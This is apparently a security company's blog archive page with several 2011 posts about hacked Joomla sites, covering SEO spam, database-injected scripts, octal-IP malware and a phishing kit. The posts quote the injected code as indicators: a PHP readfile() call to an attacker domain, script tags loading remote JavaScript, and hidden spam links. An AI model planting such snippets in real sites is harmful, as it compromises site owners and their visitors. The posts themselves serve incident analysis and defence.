Blackhat SPAM SEO From Joomlapoject.net – Targeting Joomla

June 14, 2011 by 1 Comment

We are tracking another Blackhat SEO SPAM network being managed by http://joomlapoject.net. By the name of the domain, you can guess that they are targeting Joomla sites.

When you visit a compromised site, you don’t see anything wrong, but if you view the source, there is a large block of spammy links hidden in there:

<span style="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px">
<a href="http://www.nigeriavillagesquare.com/t3-assets/css/index.php">ACD
 Systems Canvas 11 with GIS Plus</a><br><a href="http://www.nigeriavillagesquar…. hundreds more links…

All those links are generated by http://joomlapoject.net/component.php (or global.php), which gets called on the Joomla site by the following code added to the templates index.php:

<?php readfile("http://joomlapoject.net/component.php");

If you have a Joomla site make sure it is updated. You can check if it has not been compromised with this crud by viewing the source of your site, or scanning it in here: Sucuri SiteCheck. If you see a warning about SEO SPAM on our scanner, you know your site is hacked.

What’s interesting is that if you search for joomlapoject.net on Google, you will get thousands of sites found because of this warning:

“Warning: readfile(http://joomlapoject.net/component.php)” failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or …

Which probably happened when the joomlapoject site was down, causing all those errors.

If your site is hacked or compromised, we can help! Sign up here for any of our plans to get it sorted out: http://sucuri.net/signup

Filed Under: hacked, joomla, Spam Tagged With: , ,

Database Injection on Joomla Websites – yourstatscounter dot cz dot cc

April 6, 2011 by Leave a Comment

It seems that a good amount of Joomla sites are being infected with malware from the infamous “.cc” domains. All of the hacked sites have the malicious code injected directly in to their databases (SQL injection), via an unknown source (probably a vulnerable extension, but we are still researching the entry point).

This is what is being added to the infected sites (at the top of every post in the jos_content table):

<script type="text/javascript" src="http://yourstatscounter.co.cc/statscounter307.js"></script>

There are many others domains being used in this attack, including:


Read More

Filed Under: joomla, Malware, malware_updates Tagged With: , ,

Malware week – 0133.0331.0242.0033, javadisplay and more

March 10, 2011 by 3 Comments

Very busy week in terms of malware. First Hilary Kneber decided to make a come back, inlovebot.com and crazymasya.com reinfected a lot of sites, and now many outdated Joomla sites are being infected with malware from 0133.0331.0242.0033 (yes, the IP address 91.217.162.27 in octal).

This is the code added to the hacked sites:

<script src="http://0133.0331.0242.0033/0132.js" >..


Read More

Filed Under: hacked, joomla, Malware, malware_updates Tagged With: , , ,

Chase phishing – case study

March 8, 2011 by 1 Comment

Last week we were called to fix a Joomla site that was infected by malware and disabled by their hosting company. The user forwarded the email he received:

Your account was reported to us by Google for malicious content and has been deactivated.

We ran a search on your account for the content that was reported and found files that contained malicious code. We created a text file that lists the files that we found the malicious code in and put it in your home directory; The file is called malware.txt. This file is not actually infected, it is an actual list of the problem files on your account based on Google’s report. Please keep in mind that we cannot guarantee that this is a complete list of every possible issue that your account has, it is a list of what we found based on Google’s report.

Nothing really unusual as we see this many times a day.

However, after some analysis of the site, we found a directory that didn’t look quite right. It was called “chase” and was inside another hidden directory called “.webservices”…

When we looked at the content, it had 3 files:

Read More

Filed Under: hacked, joomla, phishing Tagged With: , ,

Grameen Bank web site hacked / infected with spam

March 2, 2011 by 2 Comments

The Grameen Bank is in the news today after one of its founders, Muhammad Yunus, was fired from it. You can see the news about it here.

Leaving the politics aside, what interested us is that their main web site is currently hacked and infected with blackhat SEO spam. We tried to contact them a few weeks ago about it, but got no reply (and the site remains hacked).

Even Google recently started to warn users about it with the following message: “This site may be compromised.” in the search results. Just search for “inurl:grameen.com” to verify it.

Grameen bank malware

How they got hacked? They are using a very old version of Joomla, which is probably how the attackers were able to get in. Our malware / spam scanner also finds those issues, which is only displayed to crawlers (not to normal users), which is a common technique on blackhat seo to increase their page rank.

This is the result of our scanner: http://sitecheck.sucuri.net/scanner/?scan=http://www.grameen.com/.

This shows again the important of keeping your sites updated and always monitored.

Filed Under: hacked, pharma, Spam Tagged With: , , ,

Large Blackhat SEO SPAM Campaign Targeting Joomla Sites

February 15, 2011 by 2 Comments

We are seeing a large number Joomla sites hacked and being used in a blackhat SEO SPAM campaign consisting of thousands of infected web sites. Most of them are small and using vulnerable and old versions of Joomla (1.0 and < 1.5.14).

This is how they show up in our scanner:

They all had the following code added to their index.php file to contact 188.72.201.11 and 209.160.33.108 to retrieve the list of links to show up:

Read More

Filed Under: hacked, joomla, Malware, malware_updates, pharma, Spam Tagged With: , , , , ,
Newer Posts»